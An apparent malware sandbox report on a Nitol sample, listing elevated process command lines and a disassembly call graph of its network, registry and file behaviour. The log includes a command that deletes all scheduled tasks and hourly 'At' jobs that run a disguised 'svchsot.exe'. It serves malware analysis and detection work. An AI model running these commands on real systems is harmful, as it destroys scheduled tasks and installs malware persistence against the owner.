                      General

                      Target ID:3
                      Start time:13:11:52
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:schtasks /delete /tn * /f
                      Imagebase:0x7a0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\sc.exe
                      Wow64 process (32bit):true
                      Commandline:sc config Schedule start= auto
                      Imagebase:0x910000
                      File size:61'440 bytes
                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:5
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\net.exe
                      Wow64 process (32bit):true
                      Commandline:net start "Task Scheduler"
                      Imagebase:0x3f0000
                      File size:47'104 bytes
                      MD5 hash:31890A7DE89936F922D44D677F681A7F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\net1.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\net1 start "Task Scheduler"
                      Imagebase:0xf00000
                      File size:139'776 bytes
                      MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:8
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:9
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:10
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:11
                      Start time:13:11:54
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:12
                      Start time:13:11:54
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:13
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:14
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:15
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:16
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:17
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:18
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:19
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:20
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:21
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:22
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:23
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:24
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:25
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:26
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:27
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:28
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:29
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:30
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:31
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:32
                      Start time:13:12:02
                      Start date:29/11/2024
                      Path:C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
                      Imagebase:0x400000
                      File size:187'392 bytes
                      MD5 hash:A153080F9A968B6488CF1CF2E2EA78A3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 95%, ReversingLabs
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:2%
                        Dynamic/Decrypted Code Coverage:55%
                        Signature Coverage:18.4%
                        Total number of Nodes:729
                        Total number of Limit Nodes:36
                        execution_graph 19138 10003c80 19141 10003c8a 19138->19141 19139 10003cbc select 19140 10003d43 19139->19140 19139->19141 19170 10003fc0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19140->19170 19141->19139 19142 10003ced recv 19141->19142 19145 10003d33 19141->19145 19146 10003d80 19141->19146 19142->19140 19142->19141 19147 10003db4 19146->19147 19148 10003dcc 19146->19148 19171 10003fc0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19147->19171 19150 10003e13 19148->19150 19153 10003de2 19148->19153 19202 10003660 RtlEnterCriticalSection 19150->19202 19151 10003db9 19151->19141 19172 10004040 19153->19172 19155 10003e00 19155->19141 19156 10003e59 _CxxThrowException 19157 10003e22 19156->19157 19157->19151 19157->19156 19158 100036e0 8 API calls 19157->19158 19161 10003f85 _CxxThrowException 19157->19161 19166 10003f70 _CxxThrowException 19157->19166 19168 10003660 7 API calls 19157->19168 19169 10003f56 ??3@YAXPAX ??3@YAXPAX 19157->19169 19208 100036e0 RtlEnterCriticalSection 19157->19208 19216 10003950 RtlEnterCriticalSection 19157->19216 19158->19157 19160 10003ec3 ??2@YAPAXI ??2@YAPAXI 19160->19157 19160->19161 19162 10003950 6 API calls 19161->19162 19163 10003fa5 19162->19163 19164 10004040 22 API calls 19163->19164 19165 10003fb0 19164->19165 19165->19141 19166->19161 19168->19157 19169->19157 19170->19145 19171->19151 19173 10003950 6 API calls 19172->19173 19174 10004057 19173->19174 19175 10004063 _ftol ??2@YAPAXI 19174->19175 19176 10004194 19174->19176 19177 100040a1 19175->19177 19178 10004097 19175->19178 19179 10003660 7 API calls 19176->19179 19183 100040d3 19177->19183 19184 100040bd ??3@YAXPAX 19177->19184 19178->19155 19180 100041a4 19179->19180 19181 10003950 6 API calls 19180->19181 19182 100041ae 19181->19182 19185 10003660 7 API calls 19182->19185 19186 10003660 7 API calls 19183->19186 19184->19155 19190 10004168 19185->19190 19187 100040ee 19186->19187 19188 10003660 7 API calls 19187->19188 19189 100040fc 19188->19189 19191 10003660 7 API calls 19189->19191 19219 100041c0 19190->19219 19192 1000410a 19191->19192 19193 10003660 7 API calls 19192->19193 19194 10004117 ??3@YAXPAX ??2@YAPAXI 19193->19194 19196 10003950 6 API calls 19194->19196 19198 1000414e 19196->19198 19199 10003660 7 API calls 19198->19199 19200 1000415b 19199->19200 19200->19190 19201 1000415f ??3@YAXPAX 19200->19201 19201->19190 19203 1000367b 19202->19203 19226 100037b0 19203->19226 19205 10003689 19206 1000369e RtlLeaveCriticalSection 19205->19206 19207 1000368e RtlLeaveCriticalSection 19205->19207 19206->19157 19207->19157 19209 100036fb 19208->19209 19210 10003703 RtlLeaveCriticalSection 19209->19210 19211 10003713 19209->19211 19210->19160 19212 1000376b 19211->19212 19213 1000374d memmove 19211->19213 19234 10003880 19212->19234 19213->19212 19215 1000377a RtlLeaveCriticalSection 19215->19160 19217 10003880 4 API calls 19216->19217 19218 10003970 RtlLeaveCriticalSection 19217->19218 19218->19157 19220 1000422a 19219->19220 19223 100041de 19219->19223 19222 10004230 send 19220->19222 19224 1000418a 19220->19224 19221 100041e6 send 19221->19223 19222->19220 19222->19224 19223->19221 19223->19224 19225 10004210 Sleep 19223->19225 19224->19155 19225->19220 19225->19223 19227 100037bd 19226->19227 19228 100037d0 ceil _ftol VirtualAlloc 19227->19228 19229 100037c5 19227->19229 19230 10003825 19228->19230 19231 10003819 19228->19231 19229->19205 19232 1000384c VirtualFree 19230->19232 19233 1000385e 19230->19233 19231->19205 19232->19233 19233->19205 19235 1000388c 19234->19235 19236 10003894 19235->19236 19237 1000389e ceil _ftol 19235->19237 19236->19215 19238 100038d4 19237->19238 19239 100038e2 VirtualAlloc 19238->19239 19240 100038d8 19238->19240 19243 100037a0 19239->19243 19240->19215 19244 100037a7 VirtualFree 19243->19244 19244->19215 19245 10003880 19246 1000388c 19245->19246 19247 10003894 19246->19247 19248 1000389e ceil _ftol 19246->19248 19249 100038d4 19248->19249 19250 100038e2 VirtualAlloc 19249->19250 19251 100038d8 19249->19251 19252 100037a0 19250->19252 19253 10003901 VirtualFree 19252->19253 19254 10002cc0 CreateThread CloseHandle 19275 100098b0 ??2@YAPAXI FindResourceA LoadResource LockResource 19254->19275 19328 10002410 19254->19328 19256 10002cfa 19257 10002d07 19256->19257 19258 10002d6a 19256->19258 19279 100127b0 CreateToolhelp32Snapshot ??2@YAPAXI Process32First 19257->19279 19260 100098b0 5 API calls 19258->19260 19262 10002d7b 19260->19262 19261 10002d11 19263 10002d33 19261->19263 19264 10002d18 CreateThread CloseHandle Sleep 19261->19264 19265 10002d86 GetModuleFileNameA GetWindowsDirectoryA lstrcat 19262->19265 19266 10002e07 19262->19266 19267 100127b0 7 API calls 19263->19267 19264->19263 19382 10002940 GetModuleHandleA LoadIconA LoadCursorA RegisterClassExA CreateWindowExA 19264->19382 19268 100098b0 5 API calls 19265->19268 19271 10002e2d Sleep 19266->19271 19274 10002e19 CreateThread CloseHandle 19266->19274 19270 10002d3d 19267->19270 19269 10002ddd lstrcat lstrcat MoveFileA 19268->19269 19269->19266 19272 10002d51 CreateThread CloseHandle 19270->19272 19273 10002d44 WinExec 19270->19273 19271->19271 19272->19266 19313 10002a50 GetModuleFileNameA GetWindowsDirectoryA lstrcat 19272->19313 19273->19272 19274->19271 19286 10001a20 GetSystemDirectoryA wsprintfA 19274->19286 19276 1000990b 19275->19276 19277 10009922 19276->19277 19278 10009913 ??3@YAXPAX 19276->19278 19277->19256 19278->19256 19280 1001281f 19279->19280 19281 100127df _strcmpi 19279->19281 19280->19261 19282 100127f5 19281->19282 19283 100127fd Process32Next 19281->19283 19282->19261 19283->19280 19284 10012808 lstrcmpiA 19283->19284 19284->19282 19285 10012814 Process32Next 19284->19285 19285->19280 19285->19284 19388 100018a0 CreateToolhelp32Snapshot 19286->19388 19288 10001a98 19289 10001ac3 Sleep FindFirstFileA 19288->19289 19290 10001a9c CreateFileA CloseHandle 19288->19290 19291 100023f5 19289->19291 19292 10001aef GetCurrentDirectoryA strstr 19289->19292 19290->19289 19292->19291 19293 10001b3b Sleep GetVersionExA GetSystemDefaultLCID 19292->19293 19294 10001b6e 19293->19294 19312 10001cce 19293->19312 19296 100127b0 7 API calls 19294->19296 19294->19312 19295 10001ce5 32 API calls 19295->19291 19297 10001bcb 19296->19297 19298 10001bd2 Sleep 19297->19298 19299 10001bd9 19297->19299 19298->19299 19300 100127b0 7 API calls 19299->19300 19301 10001c72 19300->19301 19302 100127b0 7 API calls 19301->19302 19301->19312 19303 10001c83 19302->19303 19304 100127b0 7 API calls 19303->19304 19303->19312 19305 10001c94 19304->19305 19306 10001c9b Sleep 19305->19306 19305->19312 19307 100127b0 7 API calls 19306->19307 19308 10001cac 19307->19308 19309 100127b0 7 API calls 19308->19309 19308->19312 19310 10001cbd 19309->19310 19311 100127b0 7 API calls 19310->19311 19310->19312 19311->19312 19312->19291 19312->19295 19314 100098b0 5 API calls 19313->19314 19315 10002ab1 lstrcat CreateDirectoryA Sleep wsprintfA lstrcat 19314->19315 19316 100098b0 5 API calls 19315->19316 19317 10002b27 19316->19317 19318 10002b41 CopyFileA wsprintfA 19317->19318 19319 10002b2e MoveFileA 19317->19319 19320 100127b0 7 API calls 19318->19320 19319->19318 19321 10002b74 19320->19321 19322 10002ba5 CreateFileA WriteFile 19321->19322 19323 10002b7b lstrlen 19321->19323 19325 10002c09 wsprintfA WriteFile 19322->19325 19400 1000df30 19323->19400 19325->19325 19326 10002c4f 6 API calls 19325->19326 19329 1000242f 19328->19329 19330 100098b0 5 API calls 19329->19330 19331 10002442 19330->19331 19332 100098b0 5 API calls 19331->19332 19333 10002455 19332->19333 19334 100098b0 5 API calls 19333->19334 19336 10002468 19334->19336 19335 10002480 sprintf CreateMutexA GetLastError 19337 100024d1 CloseHandle ExitProcess 19335->19337 19338 100024df 6 API calls 19335->19338 19336->19335 19339 10002479 19336->19339 19340 10002558 SetProcessWindowStation 19338->19340 19341 1000255f SetErrorMode 19338->19341 19340->19341 19417 10003990 19341->19417 19343 10002578 19344 100098b0 5 API calls 19343->19344 19345 10002590 19344->19345 19346 10002597 19345->19346 19359 100025d0 19345->19359 19463 1000c680 19346->19463 19351 100025ea OpenEventA 19353 10002614 19351->19353 19354 10002605 Sleep 19351->19354 19475 10003fc0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19353->19475 19354->19351 19354->19359 19355 1000263d ??3@YAXPAX 19355->19359 19356 100098b0 ??2@YAPAXI FindResourceA LoadResource LockResource ??3@YAXPAX 19356->19359 19357 10001160 malloc realloc 19357->19359 19359->19351 19359->19355 19359->19356 19359->19357 19361 100011b0 lstrlen ??2@YAPAXI strchr strchr atoi 19359->19361 19362 10002747 GetTickCount 19359->19362 19364 10002734 ??3@YAXPAX 19359->19364 19365 100026e3 ??3@YAXPAX 19359->19365 19366 10002789 GetTickCount 19359->19366 19367 10002692 ??3@YAXPAX 19359->19367 19370 10002800 Sleep 19359->19370 19372 1000280d 19359->19372 19454 1000c5e0 19359->19454 19360 1000261d CloseHandle 19360->19359 19361->19359 19426 10003b50 19362->19426 19364->19359 19365->19359 19439 10001600 GetVersionExA 19366->19439 19367->19359 19370->19359 19370->19372 19371 10002836 GetTickCount 19374 10002838 OpenEventA WaitForSingleObject Sleep 19371->19374 19372->19359 19372->19371 19373 1000c7f0 3 API calls 19372->19373 19372->19374 19373->19372 19374->19372 19375 10002872 19374->19375 19476 10003fc0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19375->19476 19377 1000287b CloseHandle 19378 1000c7f0 3 API calls 19377->19378 19379 10002898 SetErrorMode ReleaseMutex CloseHandle 19378->19379 19477 10003a90 WaitForSingleObject 19379->19477 19383 100029e0 ShowWindow UpdateWindow GetMessageA 19382->19383 19384 10002a3c 19382->19384 19383->19384 19385 10002a07 19383->19385 19386 10002a14 TranslateMessage DispatchMessageA GetMessageA 19385->19386 19386->19386 19387 10002a33 19386->19387 19389 100018f1 Process32First 19388->19389 19390 10001a07 19388->19390 19391 10001a00 CloseHandle 19389->19391 19392 1000190c GetCurrentProcessId 19389->19392 19390->19288 19391->19390 19394 10001924 OpenProcess 19392->19394 19395 100019dc Process32Next 19392->19395 19394->19390 19396 10001940 GetModuleFileNameExA 19394->19396 19395->19391 19395->19392 19396->19390 19397 1000195d _strcmpi 19396->19397 19398 100019f0 19397->19398 19399 100019d1 CloseHandle 19397->19399 19398->19288 19399->19395 19401 1000df67 19400->19401 19402 1000dfeb 19400->19402 19403 1000df95 RegOpenKeyExA 19401->19403 19404 1000e016 RegOpenKeyExA 19401->19404 19405 1000e046 RegOpenKeyExA 19401->19405 19406 1000df6e RegCreateKeyExA 19401->19406 19416 1000e09b RegCloseKey RegCloseKey 19402->19416 19403->19402 19409 1000dfb5 19403->19409 19404->19402 19410 1000e032 RegDeleteKeyA 19404->19410 19405->19402 19411 1000e062 RegDeleteValueA 19405->19411 19406->19402 19406->19403 19408 10002ba2 19408->19322 19409->19402 19413 1000dff0 RegSetValueExA 19409->19413 19414 1000dfc5 19409->19414 19410->19402 19412 1000e044 19410->19412 19411->19402 19412->19402 19413->19402 19414->19402 19415 1000dfce RegSetValueExA 19414->19415 19415->19402 19416->19408 19489 100035e0 RtlInitializeCriticalSection 19417->19489 19419 100039ba 19490 100035e0 RtlInitializeCriticalSection 19419->19490 19421 100039cd 19491 100035e0 RtlInitializeCriticalSection 19421->19491 19423 100039dd 19492 100035e0 RtlInitializeCriticalSection 19423->19492 19425 100039ed WSAStartup CreateEventA 19425->19343 19493 10003fc0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19426->19493 19428 10003b5c ResetEvent socket 19429 10003b91 gethostbyname 19428->19429 19430 10003b87 19428->19430 19431 10003ba2 19429->19431 19432 10003bac htons connect 19429->19432 19430->19359 19431->19359 19433 10003bf1 setsockopt 19432->19433 19434 10003be7 19432->19434 19435 10003c15 WSAIoctl 19433->19435 19436 10003c4f 19433->19436 19434->19359 19435->19436 19494 10012830 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 19436->19494 19438 10003c6b 19438->19359 19495 100012e0 wsprintfA 19439->19495 19441 10001644 getsockname 19500 10001240 RegOpenKeyA RegQueryValueExA RegCloseKey 19441->19500 19443 100016a4 GetSystemInfo 19501 100012a0 19443->19501 19446 100098b0 5 API calls 19447 1000170c 19446->19447 19505 10001160 19447->19505 19449 10001715 19508 100014b0 19449->19508 19451 1000174b 19452 10004040 22 API calls 19451->19452 19453 1000175f 19452->19453 19453->19359 19563 1000d360 19454->19563 19456 1000c5ee 19457 1000c602 lstrcpy 19456->19457 19458 1000c609 19456->19458 19457->19458 19459 1000c611 lstrcpy 19458->19459 19460 1000c61b 19458->19460 19459->19460 19461 1000c623 lstrcpy 19460->19461 19462 1000c62b 19460->19462 19461->19462 19462->19359 19464 1000d360 CreateEventA 19463->19464 19465 100025a8 19464->19465 19466 1000c6b0 19465->19466 19567 10012830 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 19466->19567 19468 100025bc 19469 1000c7f0 19468->19469 19470 1000c832 19469->19470 19471 1000c806 19469->19471 19568 1000d3b0 CloseHandle 19470->19568 19473 1000c814 TerminateThread CloseHandle 19471->19473 19473->19470 19473->19473 19474 1000c83b 19474->19359 19475->19360 19476->19377 19478 10003ae2 CloseHandle CloseHandle WSACleanup 19477->19478 19479 10003adb 19477->19479 19570 10003630 19478->19570 19569 10003fc0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19479->19569 19482 10003b0d 19483 10003630 2 API calls 19482->19483 19484 10003b1a 19483->19484 19485 10003630 2 API calls 19484->19485 19486 10003b27 19485->19486 19487 10003630 2 API calls 19486->19487 19488 100028c0 19487->19488 19488->19339 19489->19419 19490->19421 19491->19423 19492->19425 19493->19428 19494->19438 19518 1000da90 RegOpenKeyExA 19495->19518 19497 1000134c lstrlen 19498 10001364 lstrlen 19497->19498 19499 1000135c gethostname 19497->19499 19498->19441 19499->19498 19500->19443 19502 100012ab 19501->19502 19503 100012ce GlobalMemoryStatus 19502->19503 19504 100012af 6E341E00 19502->19504 19503->19446 19504->19502 19504->19503 19552 10001000 malloc 19505->19552 19507 10001179 19507->19449 19509 100098b0 5 API calls 19508->19509 19510 100014ca GetSystemDirectoryA FindFirstFileA 19509->19510 19511 10001551 19510->19511 19512 10001556 CreateFileA ReadFile 19510->19512 19556 10001380 19511->19556 19514 100015ba CloseHandle wsprintfA lstrlen 19512->19514 19515 100015af wsprintfA 19512->19515 19516 100015e7 lstrlen 19514->19516 19517 100015dc wsprintfA 19514->19517 19515->19514 19516->19451 19517->19516 19519 1000db06 19518->19519 19520 1000db2d 19518->19520 19546 1000deaf RegCloseKey RegCloseKey 19519->19546 19522 1000db90 19520->19522 19525 1000dca1 RegQueryValueExA 19520->19525 19526 1000ddfa wsprintfA 19520->19526 19527 1000dd6e RegEnumValueA 19520->19527 19528 1000de2e wsprintfA 19520->19528 19529 1000dcd2 RegEnumKeyExA 19520->19529 19530 1000de92 lstrcat 19520->19530 19531 1000db54 